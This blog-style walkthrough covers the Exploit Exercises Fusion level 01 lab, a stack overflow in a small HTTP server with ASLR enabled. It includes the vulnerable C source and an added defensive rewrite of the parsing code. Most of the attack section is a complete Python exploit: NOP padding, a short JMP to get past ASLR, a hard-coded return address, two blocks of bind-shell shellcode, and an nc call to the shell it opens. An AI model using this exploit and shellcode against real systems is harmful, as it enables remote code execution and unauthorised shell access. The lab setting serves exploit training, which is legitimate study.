Hello readers,
Welcome again. Today I am sharing another walkthrough, this time of Exploit Exercises Fusion level 01. This level is essentially a copy of the previous one; the only difference is that ASLR (Address Space Layout Randomization) is now enabled. Don't forget to check
Exploit Exercise Fusion level 00
So, let's start.
Hint
This is a simple introduction to get you warmed up.
The return address is supplied in case your memory needs a jog :)
Hint: Storing your shellcode inside of the fix_path 'resolved' buffer might be a bad idea due to character restrictions due to realpath(). Instead, there is plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).
Source Code
#include "../common/common.c"

int fix_path(char *path)
{
    char resolved[128];   /* only 128 bytes, while realpath() may write up to PATH_MAX (4096 on Linux) into it */
    if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
    strcpy(path, resolved);
    return 0;
}

char *parse_http_request()
{
    char buffer[1024];
    char *path;
    char *q;

    printf("[debug] buffer is at 0x%08x :-)\n", buffer);

    if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
    if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

    path = &buffer[4];
    q = strchr(path, ' ');
    if(! q) errx(0, "No protocol version specified");
    *q++ = 0;
    if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

    fix_path(path);   /* the attacker-controlled path is passed straight into the 128-byte resolved buffer */
    printf("trying to access %s\n", path);
    return path;
}

int main(int argc, char **argv, char **envp)
{
    int fd;
    char *p;

    background_process(NAME, UID, GID);
    fd = serve_forever(PORT);
    set_io(fd);
    parse_http_request();
}
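To make the root cause concrete, here is an added example (not part of the exercise's source and not code from this write-up) showing how fix_path() and the request parsing could be written so that the overflow in the listing above cannot happen. The names fix_path_safe and extract_get_path are my own; the sample requests built in main() are constructed for the demonstration, not captured traffic.

```c
#define _XOPEN_SOURCE 700   /* for realpath() in <stdlib.h> */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Bounds-safe counterpart of the exercise's fix_path() (hypothetical name).
 * Two changes: resolved[] is PATH_MAX bytes, the most realpath() may write,
 * and the copy back into path is refused when the canonical form does not
 * fit in the caller's buffer (capacity passed explicitly).
 * Returns 0 on success, 1 if realpath() fails, 2 if the result would not fit. */
int fix_path_safe(char *path, size_t path_cap)
{
    char resolved[PATH_MAX];
    if (realpath(path, resolved) == NULL)
        return 1;                          /* cannot access path */
    size_t n = strlen(resolved);
    if (n + 1 > path_cap)
        return 2;                          /* would overflow the caller's buffer */
    memcpy(path, resolved, n + 1);         /* includes the terminating NUL */
    return 0;
}

/* Request-line check to run before any path handling (hypothetical name).
 * Copies the path of "GET <path> HTTP/1.1..." into out (capacity out_cap),
 * rejecting non-printable bytes and over-long paths, so a sled of 0x90
 * bytes or raw addresses never reaches realpath().
 * Returns 0 ok, -1 not a GET, -2 no protocol, -3 bad protocol,
 * -4 non-printable byte in path, -5 path too long for out. */
int extract_get_path(const char *req, size_t req_len, char *out, size_t out_cap)
{
    if (req_len < 4 || memcmp(req, "GET ", 4) != 0) return -1;
    const char *p   = req + 4;
    const char *end = req + req_len;
    const char *q   = memchr(p, ' ', (size_t)(end - p));
    if (q == NULL) return -2;
    size_t plen = (size_t)(q - p);
    if ((size_t)(end - (q + 1)) < 8 || memcmp(q + 1, "HTTP/1.1", 8) != 0) return -3;
    for (size_t i = 0; i < plen; i++) {
        unsigned char c = (unsigned char)p[i];
        if (c < 0x20 || c > 0x7e) return -4;   /* only printable ASCII allowed in a path */
    }
    if (plen + 1 > out_cap) return -5;
    memcpy(out, p, plen);
    out[plen] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample requests: one benign, one shaped like the overflow
     * (137 bytes of 0x90 in the path). */
    const char good[] = "GET /.. HTTP/1.1\r\n";
    char bad[600];
    size_t off = 0;
    memcpy(bad + off, "GET ", 4);        off += 4;
    memset(bad + off, 0x90, 137);        off += 137;
    memcpy(bad + off, " HTTP/1.1", 9);   off += 9;

    char path[PATH_MAX];
    int rc = extract_get_path(good, sizeof good - 1, path, sizeof path);
    printf("benign request: extract=%d", rc);
    if (rc == 0) {
        rc = fix_path_safe(path, sizeof path);
        printf(" fix_path_safe=%d path=%s", rc, path);
    }
    printf("\n");
    printf("sled request:   extract=%d\n", extract_get_path(bad, off, path, sizeof path));
    return 0;
}
```

The two checks are independent: extract_get_path stops the request at the parsing stage, and fix_path_safe still refuses to overrun even if a caller forgets the first check, which is the layering you want around any realpath()/strcpy() pair.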
Here, our problem is ASLR. After spending my valuable time in research and GDB testing, I found a way to bypass this problem.
The exact problem is that the starting point of our injected shellcode sits at a randomized stack address, so we cannot hard-code it. We just need a way to get EIP to the start of our shellcode without knowing that address.
Our solution is the JMP instruction (if you don't know about it, start googling now). A short JMP is a two-byte instruction that tells EIP to move from one address to another by a relative offset, which is exactly what we want when the absolute addresses are unknown.
For example, if we want EIP to jump 39 bytes forward, the instruction is
Disassembly:
0: eb 25    jmp 0x27
Inject it like this (string literal):
"\xEB\x25"
The displacement byte is 0x25 (37): a short JMP is relative to the end of its own two bytes, so EIP lands at 2 + 37 = 0x27 = 39 bytes past the start of the instruction. Simple.
Further details are left for the reader to work out.
Here is my exploit:
#!/usr/bin/python
# import modules
import socket
import struct
import os

# Target configuration
TARGET_IP = raw_input('[+] Enter Target IP [default 192.168.43.231] : ') or '192.168.43.231'
TARGET_PORT = 20001

# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# file object wrapping the socket, used to read the server's reply
sf = s.makefile("rw")
# connect
s.connect((TARGET_IP, TARGET_PORT))

# ===================================================================
# Unsuccessful payload created from msfvenom (kept for reference;
# it is overwritten by the working payload further down)
# ===================================================================
# cmd
# msfvenom -p linux/x86/shell/bind_tcp -n 200 -f py -b '\x00\xff'
buf = ""
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB\x31\xF6\x31\xFF'
buf += "\x93\x41\x2f\x43\x48\xfc\x41\x49\x9b\x9b\x93\xf9\x9b"
buf += "\x2f\xfc\x9b\xf9\x90\x3f\x92\x93\x4b\x40\x49\x49\x92"
buf += "\xf9\x37\x92\x42\x43\x41\x91\x4b\xfd\xfc\x41\x91\x4a"
buf += "\x90\x27\xf5\x27\x90\x49\x2f\xf9\x43\x48\x42\x90\x4b"
buf += "\x2f\x37\xfc\x99\xfc\xf8\x9b\x9f\x92\x37\x4b\x93\x48"
buf += "\x43\x9f\x98\xf8\xf5\x93\x40\xf5\x41\x27\x40\x93\x3f"
buf += "\x4a\x9b\x93\x37\x41\x9f\xf8\x49\xf9\x41\xf5\x49\x91"
buf += "\x41\x42\x2f\x99\x90\x99\xf5\x37\xf9\x93\x9b\x2f\xf8"
buf += "\xf8\x41\x93\xf5\x42\x93\x49\xfc\xf5\x40\x37\x4b\x90"
buf += "\x43\xd6\x9f\xd6\x48\xf8\x42\x90\x49\x49\x2f\x2f\x37"
buf += "\x43\x92\xf8\x40\x9b\xfc\x91\x9f\x40\x40\x9f\xf8\xf8"
buf += "\x9b\xfd\xf9\x92\x91\x98\x42\x43\xfc\x49\x90\x9b\x98"
buf += "\x42\x98\x9b\x3f\x27\x40\xf8\xfd\x99\xf5\xfc\x4a\x27"
buf += "\xf8\x27\xfd\x43\x37\x49\x92\x9b\x49\x9f\x43\xd6\x92"
buf += "\x27\xfd\x4b\xfd\xf8\x49\x9f\xfc\xf8\x4a\x48\x49\x4b"
buf += "\x4b\x49\x99\x40\x92\xbe\x99\x74\x93\xf3\xda\xcb\xd9"
buf += "\x74\x24\xf4\x5d\x31\xc9\xb1\x1c\x31\x75\x14\x83\xed"
buf += "\xfc\x03\x75\x10\x7b\x81\xf9\x8e\x23\xf3\x4c\x77\x6a"
buf += "\x03\xa1\x78\x8c\x8d\x22\x1e\x0d\x6e\xa4\x2f\xc0\xf1"
buf += "\x94\x14\x2d\x12\x85\xe9\x82\xbf\x28\x67\xc5\xf0\x4b"
buf += "\xba\x85\xa0\xf9\x40\xd1\x28\xfc\x22\xd8\xfc\x97\x3a"
buf += "\x3b\x96\x99\x67\xd1\x01\xfe\x5a\xa5\x59\x7d\xa0\xb1"
buf += "\x3c\xd9\x77\xeb\xd6\xdf\x87\x1a\x7b\x8a\x97\x4d\xd3"
buf += "\xc3\x79\x07\xb5\x8b\xb4\x57\xe8\xcf\xf7\x31\xc6\x90"
buf += "\xa8\xfe\x68\xf6\xc1\x51\x8d\x3a\x51\xc2\x3b\xc8\xe2"
buf += "\xe7\x8e\x51\x85\x38\x4b\xe2\x8c\x0b\xec\xfd\x70"

# ================================================================
# Another payload (the one that worked)
# ===============================================================
# url :
# http://shell-storm.org/shellcode/files/shellcode-882.php
buf = ''
buf += "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

payload = ''
payload += 'GET '
payload += '\x90'*137 + '\xeb\x25'      # padding, then the short jmp (39 bytes forward)
payload += struct.pack("I", 0x80488b9)   # return address
payload += '/'   # <--- To stop the realpath() function from overwriting the return address
payload += '\x90'*200                    # NOP sled the jmp lands in
# shellcode here
payload += buf
payload += '\x90'*400
payload += ' HTTP/1.1'
s.send(payload)

#print sf.read(30)
s.settimeout(3)
print "[+] Wait For Response"
try:
    # a normal reply means fix_path() returned as usual, i.e. the exploit did not work
    print [sf.read(len('trying to access %s\n')+10)]
    print "[-] If You Are Reading This Message Then Probably Exploit failed."
    raw_input("[-] Exit. Trying Again..")
    s.close()
except:
    # no reply within the timeout: the process never reached printf(), so the bind shell should be listening
    print "[+] Starting Bind TCP Shell."
    print "[+] Use Commands Carefully."
    os.system('nc {} 1337'.format(TARGET_IP))
Check
Exploit Exercise Fusion level 00
Don't forget to comment below some appreciable sentences.